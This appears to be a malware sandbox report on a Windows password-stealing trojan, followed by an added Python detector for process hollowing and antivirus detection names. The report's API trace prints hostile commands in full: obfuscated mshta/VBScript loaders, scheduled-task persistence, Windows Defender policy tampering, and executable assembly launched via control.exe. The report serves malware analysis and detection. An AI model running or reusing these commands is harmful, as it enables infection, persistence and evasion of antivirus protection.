parent_process chrome.exe martian_process "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1176,17672995794706782013,1541734518934870182,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=73BCB26540B40F2EE1EA92702426D5DA --mojo-platform-channel-handle=1188 --ignored=" --type=renderer " /prefetch:2
url http://127.0.0.1
Process injection Process 1908 resumed a thread in remote process 656
Process injection Process 3016 resumed a thread in remote process 1032
Process injection Process 2532 resumed a thread in remote process 2432
Process injection Process 3276 resumed a thread in remote process 3104
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000084
suspend_count: 1
process_identifier: 656
1 0 0

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 1032
1 0 0

NtResumeThread

thread_handle: 0x0000008c
suspend_count: 0
process_identifier: 2432
1 0 0

NtResumeThread (37 consecutive identical calls)

thread_handle: 0x0000000000000150
suspend_count: 2
process_identifier: 3104
1 0 0
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000108
suspend_count: 1
process_identifier: 1108
1 0 0

CreateProcessInternalW

thread_identifier: 2364
thread_handle: 0x00000624
process_identifier: 1892
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\Documents\u7bmZ_Jch5QWYEh3mRgkn8v4.exe
track: 1
command_line: "C:\Users\test22\Documents\u7bmZ_Jch5QWYEh3mRgkn8v4.exe"
filepath_r: C:\Users\test22\Documents\u7bmZ_Jch5QWYEh3mRgkn8v4.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000628
1 1 0

CreateProcessInternalW

thread_identifier: 2044
thread_handle: 0x00000568
process_identifier: 1976
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000570
1 1 0

CreateProcessInternalW

thread_identifier: 2532
thread_handle: 0x00000568
process_identifier: 2664
current_directory:
filepath:
track: 1
command_line: schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000570
1 1 0

NtResumeThread

thread_handle: 0x000000f8
suspend_count: 1
process_identifier: 1892
1 0 0

CreateProcessInternalW

thread_identifier: 2984
thread_handle: 0x00000634
process_identifier: 2644
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000638
1 1 0

CreateProcessInternalW

thread_identifier: 2232
thread_handle: 0x000006f4
process_identifier: 1908
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000700
1 1 0

CreateProcessInternalW

thread_identifier: 2448
thread_handle: 0x000006f4
process_identifier: 2080
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000070c
1 1 0

CreateProcessInternalW

thread_identifier: 596
thread_handle: 0x00000718
process_identifier: 2744
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000724
1 1 0

CreateProcessInternalW

thread_identifier: 2840
thread_handle: 0x00000724
process_identifier: 1808
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000734
1 1 0

CreateProcessInternalW

thread_identifier: 1828
thread_handle: 0x0000072c
process_identifier: 668
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe" /mixtwo
filepath_r: C:\Users\test22\Pictures\Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000073c
1 1 0

CreateProcessInternalW

thread_identifier: 2720
thread_handle: 0x00000724
process_identifier: 2344
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe" silent
filepath_r: C:\Users\test22\Pictures\Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000740
1 1 0

CreateProcessInternalW

thread_identifier: 1884
thread_handle: 0x000006f4
process_identifier: 1204
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000071c
1 1 0

CreateProcessInternalW

thread_identifier: 3476
thread_handle: 0x00000560
process_identifier: 3472
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000006a0
1 1 0

CreateProcessInternalW

thread_identifier: 3152
thread_handle: 0x00000548
process_identifier: 3124
current_directory: C:\Users\test22\Pictures\Adobe Films
filepath: C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000690
1 1 0

NtResumeThread

thread_handle: 0x000006dc
suspend_count: 1
process_identifier: 1892
1 0 0

NtResumeThread

thread_handle: 0x00000000000000c4
suspend_count: 1
process_identifier: 2080
1 0 0

NtResumeThread

thread_handle: 0x0000000000000134
suspend_count: 1
process_identifier: 2080
1 0 0

NtResumeThread

thread_handle: 0x0000000000000174
suspend_count: 1
process_identifier: 2080
1 0 0

CreateProcessInternalW

thread_identifier: 668
thread_handle: 0x00000084
process_identifier: 656
current_directory:
filepath: C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
track: 1
command_line: "C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe"
filepath_r: C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000088
1 1 0

NtGetContextThread

thread_handle: 0x00000084
1 0 0

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 4096
process_identifier: 656
process_handle: 0x00000088
1 0 0

NtAllocateVirtualMemory

process_identifier: 656
region_size: 45056
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000088
1 0 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 656
process_handle: 0x00000088
1 1 0

NtSetContextThread

registers.eip: 2000355780 (0x773b01c4)
registers.esp: 1638384 (0x0018fff0)
registers.edi: 0
registers.eax: 4199584 (0x004014a0)
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168 (0x7efde000)
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000084
process_identifier: 656
1 0 0

NtResumeThread

thread_handle: 0x00000084
suspend_count: 1
process_identifier: 656
1 0 0

NtResumeThread

thread_handle: 0x0000017c
suspend_count: 1
process_identifier: 2744
1 0 0

CreateProcessInternalW

thread_identifier: 2552
thread_handle: 0x00000274
process_identifier: 2112
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX0
filepath: C:\Windows\System32\mshta.exe
track: 1
command_line: "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"== """" for %w iN ( ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
filepath_r: C:\Windows\System32\mshta.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000027c
1 1 0

NtResumeThread

thread_handle: 0x00000104
suspend_count: 1
process_identifier: 2112
1 0 0

CreateProcessInternalW

thread_identifier: 2612
thread_handle: 0x000000c4
process_identifier: 3016
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX0
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""== "" for %w iN ( "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ) do taskkill /f -Im "%~nXw"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002b8
1 1 0

NtResumeThread

thread_handle: 0x000000c4
suspend_count: 1
process_identifier: 2112
1 0 0

CreateProcessInternalW

thread_identifier: 2356
thread_handle: 0x00000088
process_identifier: 1032
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE
track: 1
command_line: ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd
filepath_r: C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

NtResumeThread

thread_handle: 0x00000088
suspend_count: 0
process_identifier: 1032
1 0 0

CreateProcessInternalW

thread_identifier: 1232
thread_handle: 0x00000090
process_identifier: 1040
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX0
filepath: C:\Windows\System32\taskkill.exe
track: 1
command_line: taskkill /f -Im "L_0PQ1nH1s1hf_DH8W5V8AUl.exe"
filepath_r: C:\Windows\system32\taskkill.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

NtResumeThread

thread_handle: 0x00000184
suspend_count: 1
process_identifier: 1032
1 0 0

CreateProcessInternalW

thread_identifier: 1468
thread_handle: 0x00000284
process_identifier: 2212
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX1
filepath: C:\Windows\System32\mshta.exe
track: 1
command_line: "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""== """" for %w iN ( ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" " , 0 , TrUE ) )
filepath_r: C:\Windows\System32\mshta.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000027c
1 1 0

CreateProcessInternalW

thread_identifier: 1444
thread_handle: 0x00000194
process_identifier: 2324
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX1
filepath: C:\Windows\System32\mshta.exe
track: 1
command_line: "C:\Windows\System32\mshta.exe" vbsCRipT: cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ). RuN( "Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I & del /Q * " , 0 , true ) )
filepath_r: C:\Windows\System32\mshta.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000284
1 1 0

NtResumeThread

thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2212
1 0 0

CreateProcessInternalW

thread_identifier: 288
thread_handle: 0x000000c4
process_identifier: 1408
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX1
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "== "" for %w iN ( "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000002b8
1 1 0

NtResumeThread

thread_handle: 0x00000304
suspend_count: 1
process_identifier: 2212
1 0 0

NtResumeThread

thread_handle: 0x00000104
suspend_count: 1
process_identifier: 2324
1 0 0

CreateProcessInternalW

thread_identifier: 2632
thread_handle: 0x00000308
process_identifier: 2532
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX1
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN & COPY /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I & StArT control.exe ..\QVNGP.I &del /Q *
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000310
1 1 0

NtResumeThread

thread_handle: 0x00000328
suspend_count: 1
process_identifier: 2324
1 0 0

NtResumeThread

thread_handle: 0x000000fc
suspend_count: 1
process_identifier: 2344
1 0 0

CreateProcessInternalW

thread_identifier: 3660
thread_handle: 0x000004c0
process_identifier: 3656
current_directory:
filepath:
track: 1
command_line: cmd.exe /c taskkill /f /im chrome.exe
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x000004c4
1 1 0

CreateProcessInternalW

thread_identifier: 3100
thread_handle: 0x000004d8
process_identifier: 3104
current_directory:
filepath:
track: 1
command_line: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

thread_identifier: 2728
thread_handle: 0x0000008c
process_identifier: 1332
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX1
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" EChO "
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 2228
thread_handle: 0x00000088
process_identifier: 2804
current_directory: C:\Users\test22\AppData\Local\Temp\RarSFX1
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 916
thread_handle: 0x0000008c
process_identifier: 2432
current_directory:
filepath: C:\Windows\System32\control.exe
track: 1
command_line: control.exe ..\QVNGP.I
filepath_r: C:\Windows\system32\control.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

NtResumeThread

thread_handle: 0x0000008c
suspend_count: 0
process_identifier: 2432
1 0 0
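The 1908 → 656 records in the trace above are the textbook process-hollowing sequence: CreateProcessInternalW of ZDJ2UKOjrj_0bfm6hPadSwx2.exe with CREATE_SUSPENDED, NtUnmapViewOfSection at 0x00400000, NtAllocateVirtualMemory of 0xB000 bytes PAGE_EXECUTE_READWRITE at the same base, WriteProcessMemory at 0x7efde008, NtSetContextThread, NtResumeThread. The registers the sandbox logs in decimal decode to eip 0x773b01c4 (inside ntdll), eax 0x004014a0 and ebx 0x7efde000. In a freshly created suspended 32-bit process eax holds the entry point and ebx the PEB, so after NtSetContextThread eax is the attacker's new entry point inside the 0x00400000 image, and the write to 0x7efde008 is to PEB+0x8, the ImageBaseAddress field. The `@` the report shows for that buffer is consistent with the one printable byte (0x40) of 0x00400000 in little-endian order; treating the buffer as those four bytes is an inference, not something the page states. The Python below is an added example, not the sandbox's own code: it replays a flat API trace, tracks the stages per target PID, checks their order, and derives the three corroborating facts (new entry point inside the new image, allocation over the unmapped base, PEB ImageBaseAddress rewritten to that base). The trace records are transcribed from the page; the PID 1032 resume is included as a control because it has no suspended create behind it.

```python
import struct

CREATE_SUSPENDED = 0x00000004
PAGE_EXECUTE_READWRITE = 0x40
PEB32_IMAGE_BASE_OFFSET = 0x08          # ImageBaseAddress in the 32-bit PEB
STAGES = ("create_suspended", "unmap", "alloc_rwx", "write", "set_context", "resume")

# The 1908 -> 656 sequence from the trace, as records. The WriteProcessMemory
# buffer is reconstructed (assumption): the report shows only '@' (0x40),
# consistent with 0x00400000 little-endian. Last record: control with no
# suspended create.
SAMPLE_TRACE = [
    {"api": "CreateProcessInternalW", "process_identifier": 656, "thread_handle": 0x84,
     "process_handle": 0x88, "creation_flags": 134217732},
    {"api": "NtGetContextThread", "thread_handle": 0x84},
    {"api": "NtUnmapViewOfSection", "process_identifier": 656,
     "base_address": 0x00400000, "region_size": 4096},
    {"api": "NtAllocateVirtualMemory", "process_identifier": 656,
     "base_address": 0x00400000, "region_size": 45056, "protection": 64},
    {"api": "WriteProcessMemory", "process_identifier": 656,
     "base_address": 0x7EFDE008, "buffer": b"\x00\x00\x40\x00"},
    {"api": "NtSetContextThread", "process_identifier": 656, "thread_handle": 0x84,
     "registers": {"eip": 2000355780, "esp": 1638384, "eax": 4199584, "ebx": 2130567168}},
    {"api": "NtResumeThread", "process_identifier": 656, "thread_handle": 0x84, "suspend_count": 1},
    {"api": "NtResumeThread", "process_identifier": 1032, "thread_handle": 0x88, "suspend_count": 0},
]


def detect_hollowing(trace):
    """Replay a flat API trace; for every process created suspended, record the
    hollowing stages seen and their order. Returns {pid: summary}."""
    state = {}
    for call in trace:
        api, pid = call["api"], call.get("process_identifier")
        if api == "CreateProcessInternalW":
            if call.get("creation_flags", 0) & CREATE_SUSPENDED:
                state[pid] = {"stages": ["create_suspended"], "thread": call.get("thread_handle"),
                              "unmapped": None, "alloc": None, "writes": [], "regs": {}}
            continue
        s = state.get(pid)
        if s is None:
            continue  # not a process we saw created suspended
        if api == "NtUnmapViewOfSection":
            s["unmapped"] = call["base_address"]
            s["stages"].append("unmap")
        elif api == "NtAllocateVirtualMemory" and call.get("protection") == PAGE_EXECUTE_READWRITE:
            s["alloc"] = (call["base_address"], call["region_size"])
            s["stages"].append("alloc_rwx")
        elif api == "WriteProcessMemory":
            s["writes"].append((call["base_address"], call.get("buffer", b"")))
            s["stages"].append("write")
        elif api == "NtSetContextThread" and call.get("thread_handle") == s["thread"]:
            s["regs"] = dict(call.get("registers", {}))
            s["stages"].append("set_context")
        elif api == "NtResumeThread" and call.get("thread_handle") == s["thread"]:
            s["stages"].append("resume")
    return {pid: _summarise(s) for pid, s in state.items()}


def _summarise(s):
    order = []                      # first occurrence of each stage, in trace order
    for st in s["stages"]:
        if st not in order:
            order.append(st)
    base, size = s["alloc"] or (None, 0)
    # Suspended x86 process: eax = entry point, ebx = PEB (attacker-set after NtSetContextThread).
    entry, peb = s["regs"].get("eax"), s["regs"].get("ebx")
    patched = False
    for addr, buf in s["writes"]:
        if peb is not None and addr == peb + PEB32_IMAGE_BASE_OFFSET and len(buf) == 4:
            patched = struct.unpack("<I", buf)[0] == base
    return {
        "verdict": order == list(STAGES),
        "stages": order,
        "image_base": base,
        "entry_point": entry,
        "peb": peb,
        "entry_in_new_image": base is not None and entry is not None and base <= entry < base + size,
        "alloc_over_unmapped": s["unmapped"] is not None and base == s["unmapped"],
        "peb_image_base_patched": patched,
    }


def summary_for(pid, trace=SAMPLE_TRACE):
    """Convenience accessor used by the demo and the checks."""
    return detect_hollowing(trace).get(pid)


if __name__ == "__main__":
    for pid, info in detect_hollowing(SAMPLE_TRACE).items():
        print(pid, {k: (hex(v) if isinstance(v, int) and not isinstance(v, bool) else v)
                    for k, v in info.items()})
```

The order check matters: an allocation of RWX memory or a WriteProcessMemory on its own is common in legitimate software, whereas a suspended create followed by an unmap of the image base, a re-allocation at that base and a context change on the initial thread is not. The `suspend_count: 1` on the final NtResumeThread is the initial thread's own suspension from CREATE_SUSPENDED, which is why the sequence completes with a single resume.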
Lionic Trojan.Win32.Disbuk.i!c
Elastic malicious (high confidence)
DrWeb Trojan.PWS.Stealer.31121
MicroWorld-eScan Trojan.GenericKD.37711236
FireEye Generic.mg.477b1b2a2779f1a1
ALYac Trojan.GenericKD.37711236
Cylance Unsafe
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Trojan-Downloader ( 005820621 )
Alibaba TrojanPSW:Win32/Disbuk.b3eb2291
K7GW Trojan-Downloader ( 005820621 )
BitDefenderTheta Gen:NN.ZexaF.34170.yuW@ae8rCcpi
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/TrojanDownloader.Agent.FWC
APEX Malicious
Paloalto generic.ml
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-PSW.Win32.Disbuk.gen
BitDefender Trojan.GenericKD.37711236
Avast Win32:Trojan-gen
